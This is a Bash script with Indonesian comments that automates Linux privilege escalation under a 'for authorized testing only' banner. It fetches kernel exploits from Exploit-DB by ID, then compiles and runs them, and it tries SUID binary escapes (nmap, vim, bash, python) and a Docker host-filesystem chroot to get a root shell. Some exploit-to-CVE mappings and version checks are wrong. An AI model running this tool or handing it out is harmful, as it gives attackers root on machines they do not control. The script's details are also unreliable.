#!/bin/bash # AUTO ROOT ALL KERNELS # Otomasi privilege escalation untuk semua versi kernel # FOR EDUCATIONAL/AUTHORIZED SECURITY TESTING ONLY # Warna untuk output RED='\033[0;31m' GREEN='\033[0;32m' YELLOW='\033[1;33m' BLUE='\033[0;34m' PURPLE='\033[0;35m' CYAN='\033[0;36m' NC='\033[0m' # Konfigurasi WORK_DIR="/tmp/auto_root_$(date +%s)" EXPLOIT_DB="https://www.exploit-db.com/download/" LOG_FILE="$WORK_DIR/auto_root.log" # Array exploit berdasarkan kernel declare -A KERNEL_EXPLOITS=( # Linux Kernel < 5.8 ["4.4.*"]="45010" ["4.15.*"]="47169" ["4.19.*"]="47169" ["5.4.*"]="47169" # Linux Kernel < 5.17 ["5.10.*"]="50808" ["5.15.*"]="50808" # Linux Kernel < 6.2 ["5.19.*"]="51435" ["6.0.*"]="51435" ["6.1.*"]="51435" # Exploit umum ["dirtycow"]="40839" ["dirtypipe"]="50808" ["polkit"]="50808" ["cve-2021-4034"]="50808" ["cve-2022-0847"]="50808" ) # Fungsi untuk menampilkan banner show_banner() { echo -e "${PURPLE}" cat << "EOF" ╔══════════════════════════════════════════════════════════╗ ║ AUTO ROOT ALL KERNELS ║ ║ Automated privilege escalation for all kernel versions ║ ║ FOR AUTHORIZED TESTING ONLY ║ ╚══════════════════════════════════════════════════════════╝ EOF echo -e "${NC}" } # Fungsi untuk mengecek privilege check_privilege() { if [ "$(id -u)" -eq 0 ]; then echo -e "${GREEN}[+] Sudah running sebagai root!${NC}" exit 0 fi } # Fungsi untuk membuat direktori kerja setup_workdir() { echo -e "${YELLOW}[*] Membuat direktori kerja...${NC}" mkdir -p "$WORK_DIR" cd "$WORK_DIR" # Inisialisasi log echo "AUTO ROOT LOG - $(date)" > "$LOG_FILE" echo "Kernel: $(uname -r)" >> "$LOG_FILE" echo "================================" >> "$LOG_FILE" } # Fungsi untuk mendapatkan informasi sistem get_system_info() { echo -e "${CYAN}[*] Mendapatkan informasi sistem...${NC}" KERNEL_VERSION=$(uname -r | cut -d'-' -f1) KERNEL_MAJOR=$(echo $KERNEL_VERSION | cut -d'.' -f1) KERNEL_MINOR=$(echo $KERNEL_VERSION | cut -d'.' -f2) KERNEL_PATCH=$(echo $KERNEL_VERSION | cut -d'.' -f3) DISTRO=$(cat /etc/os-release 2>/dev/null | grep -i "^id=" | cut -d'=' -f2 | tr -d '"') ARCH=$(uname -m) echo -e "${GREEN}[+] Kernel Version: $KERNEL_VERSION${NC}" echo -e "${GREEN}[+] Distribution: $DISTRO${NC}" echo -e "${GREEN}[+] Architecture: $ARCH${NC}" # Simpan ke log echo "Kernel: $KERNEL_VERSION" >> "$LOG_FILE" echo "Distro: $DISTRO" >> "$LOG_FILE" echo "Arch: $ARCH" >> "$LOG_FILE" echo "" >> "$LOG_FILE" } # Fungsi untuk mendeteksi kernel vulnerabilities detect_vulnerabilities() { echo -e "${CYAN}[*] Mendeteksi kerentanan kernel...${NC}" local vulnerabilities=() # Deteksi berdasarkan versi kernel for pattern in "${!KERNEL_EXPLOITS[@]}"; do if [[ "$KERNEL_VERSION" == $pattern ]]; then vulnerabilities+=("${KERNEL_EXPLOITS[$pattern]}") echo -e "${GREEN}[+] Potensi kerentanan: $pattern (EDB-ID: ${KERNEL_EXPLOITS[$pattern]})${NC}" fi done # Deteksi kerentanan spesifik if [[ "$KERNEL_VERSION" < "4.8.0" ]]; then vulnerabilities+=("40839") # Dirty Cow echo -e "${GREEN}[+] Potensi kerentanan: Dirty Cow (CVE-2016-5195)${NC}" fi if [[ "$KERNEL_VERSION" == "5.8"* ]] || [[ "$KERNEL_VERSION" == "5.10"* ]] || [[ "$KERNEL_VERSION" == "5.15"* ]]; then vulnerabilities+=("50808") # Dirty Pipe echo -e "${GREEN}[+] Potensi kerentanan: Dirty Pipe (CVE-2022-0847)${NC}" fi # Cek Polkit if [ -f "/usr/bin/pkexec" ]; then vulnerabilities+=("50808") # Polkit exploit echo -e "${GREEN}[+] Potensi kerentanan: Polkit (CVE-2021-4034)${NC}" fi # Hapus duplikat IFS=" " read -ra unique_vulns <<< "$(echo "${vulnerabilities[@]}" | tr ' ' '\n' | sort -u | tr '\n' ' ')" echo -e "${YELLOW}[*] Ditemukan ${#unique_vulns[@]} potensi kerentanan${NC}" # Simpan ke log echo "Vulnerabilities detected:" >> "$LOG_FILE" for vuln in "${unique_vulns[@]}"; do echo "- EDB-ID: $vuln" >> "$LOG_FILE" done echo "" >> "$LOG_FILE" echo "${unique_vulns[@]}" } # Fungsi untuk download exploit download_exploit() { local exploit_id=$1 local exploit_name=$2 echo -e "${CYAN}[*] Mendownload exploit: $exploit_name (EDB-ID: $exploit_id)${NC}" local exploit_url="${EXPLOIT_DB}${exploit_id}" local output_file="${exploit_name}_${exploit_id}.c" if command -v wget >/dev/null 2>&1; then wget -q -O "$output_file" "$exploit_url" elif command -v curl >/dev/null 2>&1; then curl -s -o "$output_file" "$exploit_url" else echo -e "${RED}[-] wget/curl tidak tersedia${NC}" return 1 fi if [ -f "$output_file" ]; then echo -e "${GREEN}[+] Exploit berhasil didownload: $output_file${NC}" echo "$output_file" else echo -e "${RED}[-] Gagal mendownload exploit${NC}" return 1 fi } # Fungsi untuk compile exploit compile_exploit() { local exploit_file=$1 local output_name=$(basename "$exploit_file" .c) echo -e "${CYAN}[*] Mengkompilasi exploit: $exploit_file${NC}" if command -v gcc >/dev/null 2>&1; then gcc -o "$output_name" "$exploit_file" 2>/dev/null else echo -e "${RED}[-] gcc tidak tersedia${NC}" return 1 fi if [ -x "$output_name" ]; then echo -e "${GREEN}[+] Exploit berhasil dikompilasi: $output_name${NC}" echo "$output_name" else echo -e "${RED}[-] Gagal mengkompilasi exploit${NC}" return 1 fi } # Fungsi untuk menjalankan exploit run_exploit() { local exploit_binary=$1 echo -e "${RED}[!!!] MENJALANKAN EXPLOIT: $exploit_binary${NC}" echo -e "${RED}[!!!] INI DAPAT MERUSAK SISTEM!${NC}" echo -e "${YELLOW}[*] Tekan Ctrl+C untuk membatalkan dalam 5 detik...${NC}" sleep 5 echo -e "${CYAN}[*] Menjalankan exploit...${NC}" # Simpan output ke log echo "Running exploit: $exploit_binary" >> "$LOG_FILE" echo "================================" >> "$LOG_FILE" # Jalankan exploit ./"$exploit_binary" 2>&1 | tee -a "$LOG_FILE" # Cek apakah berhasil if [ "$(id -u)" -eq 0 ]; then echo -e "${GREEN}[+] EXPLOIT BERHASIL! ANDA SEKARANG ROOT!${NC}" echo "EXPLOIT SUCCESSFUL!" >> "$LOG_FILE" return 0 else echo -e "${RED}[-] Exploit gagal${NC}" echo "EXPLOIT FAILED" >> "$LOG_FILE" return 1 fi } # Fungsi untuk mencoba SUID binaries try_suid_exploits() { echo -e "${CYAN}[*] Mencari SUID binaries...${NC}" local suid_found=0 find / -perm -4000 -type f 2>/dev/null | while read -r file; do echo -e "${YELLOW}[+] Ditemukan SUID: $file${NC}" suid_found=1 # Coba eksploitasi case "$file" in *nmap*) echo -e "${CYAN}[*] Mencoba exploit nmap...${NC}" nmap --interactive 2>/dev/null ;; *vim*) echo -e "${CYAN}[*] Mencoba exploit vim...${NC}" vim -c ':shell' 2>/dev/null ;; *bash*) echo -e "${CYAN}[*] Mencoba exploit bash...${NC}" ./bash -p 2>/dev/null ;; *python*) echo -e "${CYAN}[*] Mencoba exploit python...${NC}" python -c 'import os; os.setuid(0); os.system("/bin/bash")' 2>/dev/null ;; esac # Cek apakah berhasil if [ "$(id -u)" -eq 0 ]; then echo -e "${GREEN}[+] SUID exploit berhasil!${NC}" exit 0 fi done if [ "$suid_found" -eq 0 ]; then echo -e "${YELLOW}[-] Tidak ditemukan SUID binaries yang dapat dieksploitasi${NC}" fi } # Fungsi untuk mencoba exploit lainnya try_other_exploits() { echo -e "${CYAN}[*] Mencoba metode exploit lainnya...${NC}" # Cek Docker if groups | grep -q docker; then echo -e "${YELLOW}[+] User termasuk dalam grup docker${NC}" echo -e "${CYAN}[*] Mencoba exploit docker...${NC}" docker run -v /:/hostOS -it ubuntu chroot /hostOS bash 2>/dev/null fi # Cek writable files echo -e "${CYAN}[*] Mencari file yang dapat ditulis...${NC}" find / -writable -type f ! -path "/proc/*" ! -path "/sys/*" 2>/dev/null | head -10 # Cek cron jobs echo -e "${CYAN}[*] Memeriksa cron jobs...${NC}" ls -la /etc/cron* /var/spool/cron/ 2>/dev/null } # Fungsi utama main() { show_banner check_privilege setup_workdir get_system_info # Deteksi kerentanan vulnerabilities=($(detect_vulnerabilities)) # Coba SUID terlebih dahulu try_suid_exploits # Jika belum root, coba kernel exploit if [ "$(id -u)" -ne 0 ]; then echo -e "\n${PURPLE}========================================${NC}" echo -e "${PURPLE} MENCOBA KERNEL EXPLOITS ${NC}" echo -e "${PURPLE}========================================${NC}" for exploit_id in "${vulnerabilities[@]}"; do echo -e "\n${CYAN}[*] Memproses exploit EDB-ID: $exploit_id${NC}" # Download exploit exploit_file=$(download_exploit "$exploit_id" "exploit") if [ $? -ne 0 ]; then continue fi # Compile exploit exploit_binary=$(compile_exploit "$exploit_file") if [ $? -ne 0 ]; then continue fi # Jalankan exploit if run_exploit "$exploit_binary"; then exit 0 fi done fi # Jika masih belum root, coba metode lain if [ "$(id -u)" -ne 0 ]; then echo -e "\n${PURPLE}========================================${NC}" echo -e "${PURPLE} MENCOBA METODE LAIN ${NC}" echo -e "${PURPLE}========================================${NC}" try_other_exploits fi # Final check if [ "$(id -u)" -eq 0 ]; then echo -e "\n${GREEN}[+] BERHASIL MENDAPATKAN AKSES ROOT!${NC}" echo -e "${GREEN}[+] Log disimpan di: $LOG_FILE${NC}" else echo -e "\n${RED}[-] GAGAL MENDAPATKAN AKSES ROOT${NC}" echo -e "${YELLOW}[!] Coba metode manual atau periksa log: $LOG_FILE${NC}" fi } # Jalankan program main "$@"